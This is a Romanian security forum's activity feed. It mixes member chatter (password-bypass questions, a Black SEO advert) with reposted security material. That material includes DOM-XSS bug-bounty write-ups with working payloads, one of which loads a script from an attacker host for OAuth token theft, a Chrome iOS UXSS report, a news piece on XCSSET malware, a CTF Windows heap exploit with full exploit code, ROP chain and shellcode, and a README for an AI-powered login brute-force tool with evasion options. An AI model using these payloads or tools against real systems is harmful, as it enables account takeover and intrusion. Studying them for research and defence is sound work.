All Activity
- Today
- 
	jbotteam joined the community
- Yesterday
- 
	N avem bani Zatarro
- 
	cm88vision joined the community
- 
	dariuselvonn joined the community
- Last week
- 
	Phdreamcasino joined the community
- 
	Cine cumpara? ca vand eu..
- 
	Am un mesaj dragut pentru toti hackerii:
- 
	indigoalwv joined the community
- 
	ruskickwd joined the community
- 
	ok8386ws changed their profile photo
- 
	ok8386ws joined the community
- 
	nazjar joined the community
- 
	daca nu e o problema ca oricine poate face ip grabbing aici, atunci e ok...
- 
	Multi inainte. Ti-am dat approve. Merge metoda ta noua (de cativa zeci de ani), nu stiu cu ce ajuta dar spor
- 
	Salutare la toata lumea, cu speranta ca are cineva o idee, incerc sa access un disk USB, nefolosit de peste 15 ani, de la Buffalo criptat cu Secure Manager Lock easy. Parolade decriptare date nu a fost notata din pacate nicaieri. Daca are cineva o idee ce as putea sa incerc, este binevenita. Va multumesc
- 
	@Gangjas am scris in privat
- 
	Zelensky bro?
- Earlier
- 
	Mm88kmedia changed their profile photo
- 
	Vezi dreacu sa nu ajungi sa ti mananci si tu flocii, a mai fost unul pe aici...
- 
	kubetinfocom1 changed their profile photo
- 
	Salutari si bine v-am regasit Mi-am aminte recent de forum, ma bucura faptul ca este inca in picioare dupa atata timp. Ultima data aveam la profil "bautor de palinca" :)). O zi faina sa aveti!.
- 
	- 3
- 
					
						
					
							  
 
 
- 
	Salut, recent un unchi de-ai mei a degedat, odata cu el s-a dus si parola telefonului. Sotia lui are nevoie sa acceseze anumite documente destul de importante din telefon. Exista vreo optiune de a trece pe langa acea parola fara a-i da resetare totala? Multumesc!
- 
	Sa ma contactezi in privat.
- 
	Salutare exista pe aici fosti sau actuali tipi incarcerati si care se simt neadaptati? Putem vb daca e
- 
	  Pachete SEO de advertoriale pentru campanii completeGonzalez replied to Vally's topic in Black SEO & monetizare Ti-am trimis mesaj privat.
- 
	  Pachete SEO de advertoriale pentru campanii completeM4T3! replied to Vally's topic in Black SEO & monetizare Salut, si eu vreo 700 de site-uri unde pun advertoriale, daca vrei da mi mesaj privat poate colaboram cumva...
- 
	Salut, Ofer pachete SEO de advertoriale pentru campanii complete. ✔ Publicare rapidă ✔ Distribuire pe pagini de Facebook ✔ Linkuri interne la fiecare articol + linkuri externe în pachetele dedicate ✔ Raport de publicare trimis după fiecare comandă ✔ Colaborare transparentă, cu factură inclusă pentru fiecare comandă Pentru detalii, îmi poți scrie în privat.
- 
	patrickkhail started following VB 2010 Minecraft Help
- 
	DOM XSS: Bypassing Server-side Cookie Overwrite, Chrome innerHTML Quirk, and JSON Injection Hi everyone in this post I walk through three DOM-XSS findings I discovered while hunting on a bug-bounty program: a cookie-scoped bypass of server cookie overwrites, a Chrome innerHTML quirk, and a JSON injection that can overwrite window. Cookie-based DOM XSS: bypassing server-side cookie overwrite I was checking a React application in a bug-bounty program for DOM XSS vulnerabilities, and I looked not only code that parses query strings from the URL but also any code that parse document.cookie to extract values. On the login page I found a function (call it i()) that runs a regex against document.cookie to extract the lang cookie and returns that value; if the regex doesn’t match it falls back to returning “en”. The value returned by that function is then inserted unsanitized into a script element’s innerHTML as value for the language property inside a page object. function i() { const t = document.cookie.match(new RegExp("(^| )lang=([^;]+)")); const i = t ? t[2] : "en"; return { lang: i, }; } , l = document.createElement("script"); l.innerHTML = `\n var page = {\n config: {\n lang: "${p || i.lang}",.... }\n }`, document.head.appendChild(l); That means an low-impact XSS on a subdomain could be used to set a malicious lang cookie and, if that cookie is shared across subdomains, it would result in DOM XSS on the login page. There was a catch: the login page itself issues a Set-Cookie for lang on every visit, which would overwrite any malicious lang value you had set. I think they were aware of the XSS risk here that’s likely why the server updates the lang cookie on each request. document.cookie=`lang=vv",x:import(..),x:"; domain=.target.com; path=/login` While looking for ways to bypass that protection, I discovered the same code runs on the signup page but unlike the login endpoint, the signup endpoint does not return a Set-Cookie for lang. That means an attacker can set a malicious lang cookie, set it to the entire domain (shared across subdomains) and set its Path=/signup; then redirecting a user to /signup will trigger the DOM XSS there. I used this XSS to steal users’ OAuth tokens and achieved an account takeover. document.cookie=`lang=vv",x:import(..),x:"; domain=.target.com; path=/signup` location="https://www.target.com/signup" DOM XSS due to Chrome InnerHTML Quirk There was an application that registered a postMessage listener but didn’t validate the sender origin. The listener looked for a specific property in incoming messages (call it x-params) and expected it to be JSON. Sometimes x-params arrived as a string, in those cases the code checked whether the string contained HTML-encoded quotes (e.g. "). If it did not, the string was passed straight to JSON.parse. If it did contain HTML-encoded quotes, the code created a <p> element, set that string as the element’s innerHTML (but did not append the <p> to the document), then read the element’s innerText and passed that to JSON.parse. This was used as a way to decode HTML-encoded JSON; because the <p> was never inserted into the page which will not produce an XSS. However, this wasn’t a safe approach. Chrome has a quirk (previosuly mentioned by @terjanq in this tweet and discussed by @sudhanshur705 in this write-up) where assigning an <img> tag string to an element’s innerHTML can cause the browser to execute that tag even if the element is never appended to the DOM. That means an attacker can achieve XSS on the page with that vulnerable message listener by sending this following postMessage to it : vulnpage.postMessage( JSON.stringify({ body: { "x-params": ""<img src="x">" } }), "*" ); DOM XSS using JSON Injection In this case the app was fetching an the front-end configuration from an endpoint that was responding with a JSON and it was appending the page’s querystring to that fetch call. The server reflected the querystring back into a JSON field decoded (not escaped/encoded), so by sending a query containing ” / } / ] you can break out of that field, change the JSON structure, and inject arbitrary keys and values. After the config is fetched and parsed, the app passes the JSON to a function that extracts the window field and merges its contents into the global window object. Because we can inject a window key with a location property set to a javascript: payload, for example: " ] }, "window": { "location": "javascript:import('https://attacker/eval.js')" }... When the app merges that JSON into the global window object an XSS occurs, since assigning a value to window.location triggers navigation to that value, and navigating to a javascript: URI causes the browser to execute the attacker’s code in the page. Exploit example (raw, not URL-encoded): /login?v= " ] }, "window": { "location": "javascript:malicious()", "REDACTED_2": { "REDACTED_3": { "REDACTED_4": "REDACTED_5" }, "REDACTED_6": "REDACTED_7", "REDACTED_8": "REDACTED_9", "REDACTED_10": { "REDACTED_11": { "groups": [ "redx", "red" ] } }, "REDACTED_14": "REDACTED_15", "REDACTED_16": { "groups": [ "REDACTED_17" ] } }, "REDACTED_18": { "REDACTED_19": { "REDACTED_20": "REDACTED_21", "REDACTED_22": "REDACTED_23", "REDACTED_24": "REDACTED_25" } }, "REDACTED_26": { "REDACTED_27": { "REDACTED_28": true, "REDACTED_29": true } } } } , "f": { "fffff": { "v": [ "x" Thanks for reading and i hope you liked this post, you can catch me on X: @elmehdimee. Sursa: https://elmahdi4.wordpress.com/2025/09/26/dom-xss-bypassing-server-side-cookie-overwrite-chrome-innerhtml-quirk-and-json-injection/
- 
	Report description Chrome iOS UXSS Using iOS Shortcuts and Bookmarklets Bug location Where do you want to report your vulnerability? Chrome VRP – Report security issues affecting the Chrome browser. See program rules The problem Please describe the technical details of the vulnerability In Chrome iOS using iOS Shortcuts we can add a new bookmark without any user interaction and confirmation, this bookmark can also be a javascript: URI to become a bookmarklet and get code execution on opened site. Using this behavior and couple other quirks we can silently add a bookmarklet, open a website then showing the bookmarks when tapping on it the bookmarklet will execute on the current opened website without the user knowing. I don't know if there is some protection on this or it's some broken bugs that prevented us to do this straightforward but here is the pseudo code which we are able to perform the attack. Open bookmarks Open blank page and close it immediately Add the bookmarklet Wait 2 seconds and open the user bookmarks Play Chrome dino game Open google.com In the final stage the user sees the bookmarks and in background google.com is opened when tapping on the bookmarklet the code will execute on google.com. POC: Add this Shortcut https://www.icloud.com/shortcuts/cf976fbc13294b00849d5564432b2d0a Run it Tap on where it says Tap Here XSS on google.com Video POC attached. The underlying issue is ability to add a bookmark silently without user knowing or confirmation also no check on the bookmark url which allow an attacker to insert javascript: urls. Impact analysis – Please briefly explain who can exploit the vulnerability, and what they gain when doing so Using this vulnerability an attacker can trick a user to execute arbitrary code on targeted origin by running a shortcut and tapping on a bookmarklet displayed on the screen without knowing anything about it. The cause What version of Chrome have you found the security issue in? Version 137.0.7151.107 Is the security issue related to a crash? No, it is not related to a crash. Choose the type of vulnerability Site Isolation Bypass How would you like to be publicly acknowledged for your report? @RenwaX23 chrome_ios_shortcuts_uxss.mp4 26 MB Download Sursa: https://issues.chromium.org/issues/426631847 Via: https://x.com/RenwaX23/status/1971925046047498432
- 
	Token Theft attacks have risen during the past few years as organisations have moved to stronger authentication methods. Entra ID has built-in protections to mitigate these attacks. This session will cover how to use these protections and technical details of how they work under the hood. Although 99 % of identity attacks are still password-related, organisations are moving to using stronger authentication methods, making these attacks obsolete. In recent years, we have witnessed a rising number of Token Theft attacks. As tokens are issued after successful login, attackers can use them to impersonate users without a need to care about the authentication methods used. The two most often used Token Theft techniques are Adversary-in-the-Middle (AitM) attacks and malware on the endpoint. The former can be performed remotely (e.g., via phishing), whereas the latter requires access to the victim’s endpoint (much harder). In this demo-packed session, I will cover various Entra ID built-in Token Theft protection techniques, such as Token Protection and Continuous Access Evaluation (CAE). These techniques are not silver bullets though, so I will share the technical details of how they work under the hood. I will show what they really protect against, but also how threat actors can leverage them in specific scenarios. After the session, you will know the technical details of Entra ID Token Theft protection features, how to use them, how threat actors may leverage them, and how to detect this.
- 
	Microsoft spots fresh XCSSET malware strain hiding in Apple dev projects Upgraded nasty slips into Xcode builds, steals crypto, and disables macOS defenses Carly Page Fri 26 Sep 2025 // 15:23 UTC The long-running XCSSET malware strain has evolved again, with Microsoft warning of a new macOS variant that expands its bag of tricks while continuing to target developers. Redmond's threat hunters said the latest version of XCSSET, which has been circulating since at least 2020, continues to spread by attaching itself to Xcode projects but now sports new capabilities to further complicate the lives of victims. Xcode is a suite of developer tools for building apps on Apple devices. This isn't the first time it has re-emerged. Back in February, Microsoft warned that a resurgence of the malware had already been using compromised developer projects to deliver malicious payloads. Now the gang behind it appears to have gone further, building in stealthier persistence mechanisms, more obfuscation, and a a growing appetite for crypto theft. The infection chain looks familiar – four stages, culminating in the execution of various submodules – but the final stage has been reworked. Among the more notable changes is a module that targets Firefox, stealing information with the help of a retooled build of the open source HackBrowserData tool. There's also a new clipboard hijacker designed to monitor copied text and replace cryptocurrency wallet addresses with those belonging to the attackers. Additionally, Microsoft reports that the malware installs a LaunchDaemon that executes a hidden payload called .root and even drops a bogus System Settings.app file in /tmp to conceal its activity. The authors have also added more layers of obfuscation, including the use of run-only compiled AppleScripts, and the malware attempts to blunt Apple's defenses by disabling macOS automatic updates and Rapid Security Responses. Microsoft says these tweaks suggest the operators are intent on sticking around undetected for as long as possible while broadening their chances of monetization. For developers, the threat vector remains the same: the malware slips into Xcode projects, so when a developer builds the code, they unwittingly execute the malicious payload. In February, researchers warned that compromised repositories and shared projects were already serving as distribution vehicles. This latest iteration makes embedding easier by using various strategies within project settings to evade detection. Microsoft stressed that attacks seen so far have been limited, but given XCSSET's persistence over the years, the new modules are a reminder that Apple's developer ecosystem remains a ripe target. The company has shared its findings with Apple and collaborated with GitHub to remove repositories affected by XCSSET. The company is also urging developers to scrutinize projects before running builds, keep macOS patched, and use endpoint security tools capable of detecting suspicious daemons and property list modifications. It's a warning Redmond knows the value of firsthand, having faced its own share of malware and state-backed intrusions in recent years. XCSSET may not have the same name recognition as LockBit or other ransomware gangs, but it has proven surprisingly resilient. For anyone working in Xcode, the takeaway is clear: don't assume a project is safe – the next build you run could be doing far more than you expect. ® Sursa: https://www.theregister.com/2025/09/26/microsoft_xcsset_macos/
- 
	Windows Heap Exploitation - From Heap Overflow to Arbitrary R/W Suraj Malhotra 2025-09-27 Vulnerability Research Exploit, Heap, Windows TLDR I was unable to find some good writeups/blogposts on Windows user mode heap exploitation which inspired me to write an introductory but practical post on Windows heap internals and exploitation. I cover the basics of Low Fragmentation Heap, Heap Overflow Attack, and File Struct Exploitation in Windows. Kudos to Angelboy for authoring the great challenge, “dadadb” which we’ll be using as a learning example. A Primer on Windows Heap Internals The Windows Heap is divided into the following. NT Heap Exists since early versions of Windows NT. The default heap implementation up through Windows 7/8. Segment Heap Introduced in Windows 10 as the modern heap manager. Default for apps built with the Universal Windows Platform (UWP), Microsoft Edge, and newer apps. We’ll talk about the NT Heap here for our challenge. Further Nt Heap is divided into BackEnd and FrontEnd Allocators and have the following differences : FrontEnd Allocator Handles small allocations (usually < 16 KB) Uses the Low Fragmentation Heap (aka LFH, we’ll talk about this) Used for faster allocations/frees where performance is the priority. BackEnd Allocator Handles large allocations Core allocator responsible for demanding memory from OS. Low Fragmentation Heap (LFH) Now we need to have a basic understanding of LFH for our usecase. LFH was made for performance as it takes into account the common size allocations and allocates them efficiently. “Low Fragmentation“ also comes from the fact that there is no consolidation and coalescing of chunks if they are allocated or freed. It serves the allocations using a pool instead of requesting backend everytime. The chunks are located in the memory within a struct named UserBlock, which is simply a collection of pages which are broken into pieces of the same size. It only gets triggered if we allocate 18 subsequent allocations of a similar small size. The maximum chunk size LFH handles is ~16 KB (0x4000). Anything larger than that bypasses LFH and goes to the NT heap backend. Default Process Heap V/S Private Heap The windows heap is also divided into how the heap is initialised for the process. Default Process Heap Functions like malloc, new, and HeapAlloc(GetProcessHeap(), ...) usually allocate from this heap unless otherwise specified. 1 2 3 4 5 6 7 typedef struct _PEB { ... PVOID ProcessHeap; // Default heap (same as GetProcessHeap()) ULONG NumberOfHeaps; PVOID* ProcessHeaps; // Array of heap handles ... } PEB, *PPEB; 1 2 3 HANDLE GetProcessHeap() { return NtCurrentTeb()->ProcessEnvironmentBlock->ProcessHeap; } Private Heap Created explicitly by a process using: 1 2 3 4 HANDLE customHeap = HeapCreate(0, 0, 0); void* mem = HeapAlloc(customHeap, 0, 1024); HeapFree(customHeap, 0, mem); HeapDestroy(customHeap); I guess its time to hop onto our challenge now! 🤓 Inital Analysis This challenge was named “dadadb“ and is from Hitcon 2019 Quals. It should be run on Windows Server 2019 x64 as specified by the author. Here is a sample run of the application for your reference. It looks like a database like program which allows us to add, update and remove a record. The record structure looks like the following. 1 2 3 4 5 6 struct record{ char* data; size_t size; char key[0x41]; struct record* next; }; There seems to be a login feature to manage different users as well. The program reads the user.txt within the same directory which includes the username and password combination as follows. 1 2 3 4 #user.txt orange:godlike ddaa:phdphd ... So to summarise the functionalities of the program include : Login (If Successful) Add Record Searches the database for the record by key, if not available add it. Also used to update a previous record data. Remove Record Removes an existing record by its key. View Record View the Data in a specific record. Exit Exit The Vulnerability So the vulnerability exists in the add/update function where it re-uses the previous size of the record to read the new data It could lead to a heap overflow attack if the same record is updated with the new size of data is less than its old size. Also it doesn’t assign the new updated size of the record to target->size, which is used while using the VIEW feature. We could abuse this to gain arbitrary read as well If you’ll notice carefully our program creates a private heap where it stores all the records. We’ll need to use LFH to exploit it for the following reasons : The location of a chunk allocated by LFH is more deterministic There are less safety checks in LFH as compared to the private heap as it is made for performance. Arbitrary Read As I said earlier we need to activate the LFH by subsequently making 18 similar allocations. Since LFH is now activated we need to fill the UserBlock. 1 2 3 4 for i in range(19): add(f'LFH_{i}', 0x90, 'LFH') for i in range(0x10): add(f'record_{i}', 0x90, 'LFH') We’ll now create a hole using the remove feature. This time we’ll reuse and update an existing record and if we request for an allocation of size equal to the size of our record structure ie. (0x60 bytes) we’ll get the same chunk and write some data into it. The userblock layout will look somewhat like this after these steps. We write the following code to do it. 1 2 3 4 remove('record_0') add('record_1', 0x60, 'A'*0x60) #now viewing it leaks the information about the chunk below it 💀 view('record_1') Afterwards we could also overflow this data buffer to overwrite the data pointer of the next record structure in memory and use the VIEW feature to finally gain arbitrary read. 🙌 1 2 3 4 def leak(addr): add(b'fill_1', 0x60, b'A' * 0x70 + p64(addr)) view(next_record) return u64(proc.recv(8)) We need to leak the following : Heap Base Address Using the arbitrary leak we could easily get the Data pointer and therefore the heap base address. ntdll Base Address There exists a lock variable in the Heap structure at an offset ie. 0x2c0 which could help to leak ntdll base address. You could refer the following to verify. We could also confirm this via the !address command to check which module does this lie in. PEB Fortunately there exists a pointer to PEB’s TlsExpansionBitmapBits member inside ntdll. We could grab its offset to leak PEB as well. Stack Limit from TEB Usually the TEB for the specific thread is at PEB_addr + 0x1000 PEBLdr We can easily get it from PEB as its at the 0x18 offset. InLoadOrderModuleList Its at 0x10 offset in PEBLdr. Binary Base Its the first member in the InLoadOrderModuleList. Kernel32 Base Address (Get Address of CreateFile, ReadFile & WriteFile) We’ll need to call these WinAPIs in our rop chain. We could also get it from the InLoadOrderModuleList as well but it is quite easier to just make use of the challenge binary’s Import Address Table to get some specific WinAPI offset for eg. ReadFile and then later calculate its offset from base. Process Parameters (stdout) Process Parameters is a member of PEB which contains the handle to our process stdout (we’ll eventually need this later). Finding Return Address on Stack Now we could use the stack limit from the TEB to scan for the return address location in stack. We could try overwriting the return address of a write call used in the View feature. We could also add some seed to stack limit to land near the return address. 1 2 3 4 5 6 7 8 9 10 11 12 target = bin_base + 0x1b60 ret_addr = stack_limit + 0x2800 found = False for i in range(0x1000 // 8): val_addr = leak(ret_addr) print(i, hex(ret_addr), hex(val_addr)) if val_addr == target: print('Found return address') found = True break ret_addr += 8 assert found Arbitrary Write Now all we need is to overwrite the return address in stack but we need an arbitrary write primitive to do that. For that we need to take a look at the heap chunk structure in windows. The chunk header is 16 bytes and the free chunk includes two pointers, FLink and BLink which point to other free chunks in the freelist. If you’ll observe carefully we’ve the following pointers in the data section. What if we could overwrite that File Stream pointer and use File Struct exploitation to gain arbitrary write? HUH! Sounds interesting right? Lets try to forge fake chunks and overwrite these pointers. First, we need to create a heap layout in memory with some holes as follows. This could be done in the following manner. 1 2 3 4 5 6 7 add(b'A', 0x400, b'AAAA' * 8) add(b'A', 0x100, b'AAAA' * 8) add(b'B', 0x100, b'BBBB' * 8) add(b'C', 0x100, b'CCCC' * 8) add(b'D', 0x100, b'DDDD' * 8) remove(b'D') remove(b'B') now if we view A we could leak the following: B’s Flink and Blink D’s Flink and Blink 1 2 3 4 5 6 7 8 9 10 proc.recv(0x100) # recv all A data fake_chunk_header = proc.recv(0x10) # recv B header which is 16 bytes # now get B's FLink and BLink B_flink = u64(proc.recv(8)) # the FLink should point to D B_blink = u64(proc.recv(8)) proc.recv(0x100 + 0x110) # skip B's data, C's data and D's header # now get B's FLink and BLink D_flink = u64(proc.recv(8)) D_blink = u64(proc.recv(8)) B_addr = D_blink We could now unlink D from B and link the password and username fake chunks to B instead. This could be done in the following manner. 1 2 3 4 5 6 7 8 9 10 11 pass_adr = bin_base + 0x5648 user_adr = bin_base + 0x5620 add(b'A', 0x100, b'A' * 0x100 + fake_chunk_header + p64(pass_adr + 0x10)) logout() # Freelist : B->fake2(pass)->fake1(user) fake2 = b'phdphd\x00'.ljust(8, b'\x00') + fake_chunk_header[8:] #the flink is fake chunk at user buf and blink is B chunk fake2 += p64(user_adr + 0x10) + p64(D_blink) fake1 = b'ddaa\x00'.ljust(8, b'\x00') + fake_chunk_header[8:] # flink is flink of D and blink is fake chunk at password fake1 += p64(D_flink) + p64(pass_adr + 0x10) After creating those fake chunks our freelist looks like following. We had to forge two chunks as while unlinking password chunk from the freelist malloc would check for list integrity as : fd->bk == candidate and bk->fd == candidate So we the fake chunk at user buff will have the BLink pointing to password which would succeed here. File Struct Exploitation Now we could use file struct exploitation here to overwrite the File Stream pointer and get arbitrary write. Lets discuss how The file struct on windows is defined in ucrtbase.dll and looks like the following 1 2 3 4 5 6 7 8 9 10 11 typedef struct _iobuf { char* _ptr; // Pointer to next character in buffer. int _cnt; // Remaining chars in buffer for read/write. char* _base; // Pointer to start of buffer. int _flag; // Stream state flags (read/write/error/EOF). int _file; // CRT file descriptor index. int _charbuf; // Single-char buffer (e.g., for ungetc). int _bufsiz; // Size of the buffer in bytes. char* _tmpfname; // Name of temp file if created, else NULL. } FILE; Now we could use this information to craft our own FILE object and overwrite the File Stream pointer sitting just below our fake password chunk. _base Memory address which we want to overwrite which is the return address in our case. _file File Descriptor of STDIN ie. 0 (which is used to write into the address specified in _base) _flag We need to set this to both of the following: 1 2 3 4 5 6 7 8 // (*) USER: The buffer was allocated by the user and was configured via // the setvbuf() function. _IOBUFFER_USER = 0x0080, // Allocation state bit: When this flag is set it indicates that the stream // is currently allocated and in-use. If this flag is not set, it indicates // that the stream is free and available for use. _IOALLOCATED = 0x2000, _bufsiz It should be just more than how many bytes you are planning to write into the address. We’ll keep it 0x200 for now. The overall code for creating the File Stream object looks like following. 1 2 3 4 5 6 7 8 9 10 11 12 _IOBUFFER_USER = 0x80 _IOALLOCATED = 0x2000 cnt = 0 _ptr = 0 _base = ret_addr flag = _IOBUFFER_USER | _IOALLOCATED fd = 0 bufsize = 0x200 obj = p64(_ptr) + p64(_base) + p32(cnt) + p32(flag) obj += p32(fd) + p32(0) + p64(bufsize) +p64(0) obj += p64(0xffffffffffffffff) + p32(0xffffffff) + p32(0) + p64(0)*2 Now we need to do a login which in turn will invoke the fread function and our malformed File object would be used then. If you refer the previous freelist image you’ll notice that B is at the top, therefore we could pop it and write our malformed FILE object into it. 1 add(b'WeGetBChunkHere', 0x100, obj) Afterwards we’ll get our password chunk for next allocation. And now we could overwrite the address of B chunk(contains our File Object now) to the File Stream pointer as from the layout it is just below it. 1 add(b'WeGetPassChunk', 0x100, b'a' * 0x10 + p64(B_addr)) We managed to successfully overwrite the File Stream pointer! 💪 Constructing our ROP Chain The No-Child-Process mitigation is turned on for this challenge so we can’t really spawn another process to read the flag and have to write shellcode for reading the flag. We could make use of the Kernel32 APIs we got earlier here. We will use the ReadFile WinAPI to read our shellcode at a particular address in data section. Afterwards we need to use VirtualProtect to turn that region executable. Please keep in mind on Windows, WinAPI arguments are passed right-to-left on the stack in x86 (stdcall) and via RCX, RDX, R8, R9 registers with stack for extras in x64 (Microsoft x64 calling convention) And fortunately we find the perfect gadget in ntdll to fill in these registers. Now we get offsets of all the required WinApis as well. 1 2 3 4 5 6 pop_rdx_rcx_r8_r9_r10_r11 = ntdll + 0x8fc30 shellcode_addr = program + 0x5000 readfile = kernel32 + 0x22680 virtualprotect = kernel32 + 0x1b680 writefile = kernel32 + 0x22770 createfile = kernel32 + 0x222f0 Our final rop chain looks like the following: 1 2 3 4 5 6 7 buf = p64(pop_rdx_rcx_r8_r9_r10_r11) + p64(shellcode_addr) buf += p64(stdin) + p64(0x100) +p64(shellcode_addr + 0x100) + p64(10) + p64(11) + p64(readfile) buf += p64(pop_rdx_rcx_r8_r9_r10_r11) + p64(0x1000) + p64(shellcode_addr) buf += p64(0x40) + p64(ret_addr + 0x100 - 8) + p64(0) + p64(11) buf += p64(virtualprotect) + p64(shellcode_addr) proc.send(buf.ljust(0x100 - 8) + p64(0x4)) Our shellcode for reading the flag would be: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 jmp getflag flag: pop r11 createfile: mov qword ptr [rsp + 0x30], 0 mov qword ptr [rsp + 0x28], 0x80 mov qword ptr [rsp + 0x20], 3 xor r9, r9 mov r8, 1 mov rdx, 0x80000000 mov rcx, r11 mov rax, {createfile} call rax readfile: mov qword ptr [rsp + 0x20], 0 lea r9, [rsp + 0x200] mov r8, 0x100 lea rdx, [rsp + 0x100] mov rcx, rax mov rax, {readfile} call rax writefile: mov qword ptr [rsp + 0x20], 0 lea r9, [rsp + 0x200] mov r8, 0x100 lea rdx, [rsp + 0x100] mov rcx, {stdout} mov rax, {writefile} call rax loop: jmp loop getflag: call flag Here is our final exploit in action! Final Thoughts This was a good little exercise for learning the basics. Thanks to my friend @Owl.A for helping me out with my doubts :). I was procastinating a lot so wrote it in a hurry which we’ll help me prepare notes as well, hope you liked it! I’m still deepening my understanding of Windows user‑mode heap internals and exploitation techniques so constructive feedback and corrections are very welcome. If you’d like more deep dives, practical demos, and writeups on heap exploitation, keep an eye on this blog — there’s more coming. 😉 The exploit code could be found here : mrT4ntr4/Challenge-Solution-Files/HitconQuals_2019_dadadb References https://www.slideshare.net/AngelBoy1/windows-10-nt-heap-exploitation-english-version https://github.com/scwuaptx/CTF/tree/master/2019-writeup/hitcon/dadadb https://jackgrence.github.io/HITCON-CTF-2019-dadadb-Writeup/ https://chujdk.github.io/wp/1624.html https://github.com/peleghd/Windows-10-Exploitation/blob/master/Low_Fragmentation_Heap_(LFH)_Exploitation_-_Windows_10_Userspace_by_Saar_Amar.pdf Sursa: https://mrt4ntr4.github.io/Windows-Heap-Exploitation-dadadb/
- 
	BruteForceAI - AI-Powered Login Brute Force Tool Advanced LLM-powered brute-force tool combining AI intelligence with automated login attacks Features • Installation • Usage • Examples • Configuration • License 🎯 About BruteForceAI is an advanced penetration testing tool that revolutionizes traditional brute-force attacks by integrating Large Language Models (LLM) for intelligent form analysis. The tool automatically identifies login form selectors using AI, then executes sophisticated multi-threaded attacks with human-like behavior patterns. 🧠 LLM-Powered Form Analysis Stage 1 (AI Analysis): LLM analyzes HTML content to identify login form elements and selectors Stage 2 (Smart Attack): Executes intelligent brute-force attacks using AI-discovered selectors 🚀 Advanced Attack Features Multi-threaded execution with synchronized delays Bruteforce & Password Spray attack modes Human-like timing with jitter and randomization User-Agent rotation for better evasion Webhook notifications (Discord, Slack, Teams, Telegram) Comprehensive logging with SQLite database 🌟 Star History ✨ Features 🔍 Intelligent Analysis LLM-powered form selector identification (Ollama/Groq) Automatic retry with feedback learning DOM change detection for success validation Smart HTML content extraction ⚡ Advanced Attacks Bruteforce Mode: Try all username/password combinations Password Spray Mode: Test each password against all usernames Multi-threaded execution (1-100+ threads) Synchronized delays between attempts for same user 🎭 Evasion Techniques Random User-Agent rotation Configurable delays with jitter Human-like timing patterns Proxy support Browser visibility control 📊 Monitoring & Notifications Real-time webhook notifications on success Comprehensive SQLite logging Verbose timestamped output Success exit after first valid credentials Skip existing attempts (duplicate prevention) 🛠️ Operational Features Output capture to files Colorful terminal interface Network error retry mechanism Force retry existing attempts Database management tools Automatic update checking from mordavid.com 🔧 Installation Prerequisites # Python 3.8 or higher python --version # Install Playwright browsers playwright install chromium Install Dependencies pip install -r requirements.txt Required packages: playwright - Browser automation requests - HTTP requests PyYAML - YAML parsing for update checks LLM Setup Option 1: Ollama (Local) # Install Ollama curl -fsSL https://ollama.ai/install.sh | sh # Pull recommended model ollama pull llama3.2:3b Option 2: Groq (Cloud) Get API key from Groq Console Use with --llm-provider groq --llm-api-key YOUR_KEY 🧠 Model Selection & Performance Recommended Models by Provider Ollama (Local): llama3.2:3b - Default, good balance of speed and quality llama3.2:1b - Fastest, smaller model for quick analysis qwen2.5:3b - Alternative with good performance Groq (Cloud): llama-3.3-70b-versatile - Default & Best - Latest model with superior quality (1 attempt) llama3-70b-8192 - Fast and reliable alternative (1 attempt) gemma2-9b-it - Lightweight option, good for simple forms (1 attempt) llama-3.1-8b-instant - ⚠️ Not recommended (rate limiting issues, 3+ attempts) Performance Tips # Best quality (recommended for complex forms) python main.py analyze --urls targets.txt --llm-provider groq --llm-model llama-3.3-70b-versatile --llm-api-key YOUR_KEY # Fast and reliable python main.py analyze --urls targets.txt --llm-provider groq --llm-model llama3-70b-8192 --llm-api-key YOUR_KEY # Lightweight for simple forms python main.py analyze --urls targets.txt --llm-provider groq --llm-model gemma2-9b-it --llm-api-key YOUR_KEY # Local processing (no API key needed) python main.py analyze --urls targets.txt --llm-provider ollama --llm-model llama3.2:3b 📖 Usage Basic Commands Stage 1: Analyze Login Forms python main.py analyze --urls urls.txt --llm-provider ollama Stage 2: Execute Attack python main.py attack --urls urls.txt --usernames users.txt --passwords passwords.txt --threads 10 Command Structure python main.py <command> [options] Available Commands analyze - Analyze login forms with LLM attack - Execute brute-force attacks clean-db - Clean database tables check-updates - Check for software updates 🎯 Examples 1. Complete Workflow # Step 1: Analyze forms python main.py analyze --urls targets.txt --llm-provider ollama --llm-model llama3.2:3b # Step 2: Attack with 20 threads python main.py attack --urls targets.txt --usernames users.txt --passwords passwords.txt --threads 20 --delay 5 --jitter 2 2. Advanced Attack Configuration python main.py attack \ --urls targets.txt \ --usernames users.txt \ --passwords passwords.txt \ --mode passwordspray \ --threads 15 \ --delay 10 \ --jitter 3 \ --success-exit \ --user-agents user_agents.txt \ --verbose \ --output results.txt 3. With Webhook Notifications python main.py attack \ --urls targets.txt \ --usernames users.txt \ --passwords passwords.txt \ --discord-webhook "https://discord.com/api/webhooks/..." \ --slack-webhook "https://hooks.slack.com/services/..." \ --threads 10 4. Browser Debugging python main.py analyze \ --urls targets.txt \ --show-browser \ --browser-wait 5 \ --debug \ --llm-provider ollama 5. Check for Updates # Check for software updates python main.py check-updates # Check with output to file python main.py check-updates --output update_check.txt Manual Check (Detailed) # Check for updates manually (same as automatic but can save to file) python main.py check-updates # Check with output to file python main.py check-updates --output update_check.txt Skip Version Check # Skip version check completely for faster startup python main.py analyze --urls targets.txt --skip-version-check python main.py attack --urls targets.txt --usernames users.txt --passwords passwords.txt --skip-version-check # Also works as global flag (before subcommand) python main.py --skip-version-check analyze --urls targets.txt ⚙️ Configuration Options Analysis Options Parameter Description Default --llm-provider LLM provider (ollama/groq) ollama --llm-model Model name llama3.2:3b (ollama), llama-3.3-70b-versatile (groq) --llm-api-key API key for Groq None --selector-retry Retry attempts for selectors 10 --force-reanalyze Force re-analysis False Attack Options Parameter Description Default --mode Attack mode (bruteforce/passwordspray) bruteforce --threads Number of threads 1 --delay Delay between attempts (seconds) 0 --jitter Random jitter (seconds) 0 --success-exit Stop after first success False --force-retry Retry existing attempts False Detection Options Parameter Description Default --dom-threshold DOM difference threshold 100 --retry-attempts Network retry attempts 3 Evasion Options Parameter Description Default --user-agents User-Agent file None --proxy Proxy server None --show-browser Show browser window False --browser-wait Wait time when visible 0 Output Options Parameter Description Default --verbose Detailed timestamps False --debug Debug information False --output Save output to file None --no-color Disable colors False Webhook Options Parameter Description --discord-webhook Discord webhook URL --slack-webhook Slack webhook URL --teams-webhook Teams webhook URL --telegram-webhook Telegram bot token --telegram-chat-id Telegram chat ID 🔄 Update Management 